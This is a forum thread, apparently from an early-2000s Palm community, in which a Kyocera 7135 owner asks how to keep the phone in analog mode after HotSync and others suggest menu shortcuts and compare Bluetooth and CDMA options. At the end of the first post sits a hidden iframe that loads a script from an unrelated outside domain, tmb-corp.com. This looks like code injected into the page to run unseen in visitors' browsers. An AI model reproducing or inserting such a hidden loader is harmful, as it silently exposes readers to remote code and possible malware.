I posted this on PDA Buzz because I could not get into this forum for some reason, but today I got back in. Here is what I posted there, maybe somebody can help here:
I used a 6035 for years. In my home office I can only use Analog as the digital signal is too weak. I would switch to analog mode, and leave the phone in this mode until leaving my home office. You can do this very easily by pushing in the scroll button which brings up the phone menu. By pressing 4, then 7, then 1, and then 2, the phone would now be in analog mode. And it would STAY in analog mode until you switched it over again, or unless you turned the phone off, and then back on again, as the default is Automatic.
With the 7135 there is no scroll button, and I don't know of any numerical sequence to switch to Analog mode. That is my first peeve.
The second is that when you bring up the phone menu the screen is not touch sensitive. You HAVE to use the up/down key, and then press the OK key to select. You then have to select Phone Service (now the screen is touch sensitive), then you have to select Automatic, then switch to Analog Only, and only THEN are you in Analog mode.
That is bad enough! But what is even WORSE is that I found out that everytime you Hotsync the 7135, it automatically reverts back to Automatic Mode. Now I have to go through this whole sequence again to switch to Analog Mode.
Does anyone know a short-cut to setting to Analog? And is there a way to default the phone to Analog? Or perhaps set it so it does not revert back to Automatic??
Some info would be greatly appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
access the phone prefs from the pda side so it is touch sensitive, then leave the option on phone service,it will be the screen that shows when you push prefs phone.its only a two push process.as far as the hotsync issue.why are you syncing at the office.is it to backup and update avantgo? IF so,you cna backup via the sd card, and update avantgo with a modem sync.neither would change any settings.if it is to update desktop calender or contacts then maybe you could check into wireless sync(a verizon service).
better yet, create a category called my apps and put only prefs phone in it.leave it on this screen so it is the first screen you see when you hit the house button. so just hit house, prefs phone and it will still be on the phone service screen, push the two pushes needed to change to analog.total 4 pushes, same or less than on the 6035.only issue is if you need the stylus to make the digital/analog change( i can do it without)
Interesting! You know, that is how I got around the Hotsync problem. I created a catagory "01" so that it is the first one after the "all" list. That way, if the all list is active, I would push the house twice, and then push the hotsync icon. Never thought to add Phone Prefs in here, but just did and it is relatively quick. And yes, I have been doing it without the stylus so it works. Still, these things should not be happening, but maybe that is the price you pay for a hybrid. I am just testing this phone to see if I like it, but when you see the Tungsten T3 and the price coming down, mate it with a bluetooth phone... I am in Canada and they want $700 (Canadian, that is about US$525) for a 7135. I think that is WAY too much money for what you are getting! The T3 is going for under US$340 and look at all the real estate! My only problem is that bluetooth phones with good service are hard to locate. Anybody out there knows of a good setup in the Toronto or Hamilton Ontario area?
find me a good vzw/cdma bluetooth phone and maybe that is an option.i need the coverage for voice, especially in rural areas that only verizon can provide,i could never consider a gsm phone due to poor coverage outside metro areas.i would get the treo 600 in a minute due to the faster processor alone but its not a verizon option and sprints cdma coverage doesnt cut it for me.even if i got a good roaming signal i can only use half my minutes for roaming.there are times when i go for months without going into a sprint area,it just wouldnt work for me.right now,the 7135 is the best palm device that works on verizon cdma, until something better comes along i am happy.besides,i have now had this phone for 10 months and its still the most versatile option for palm/cdma/verizon out there.i feel i made a good buy,1 year is about as long as i ever have kept the same palm or cel phone
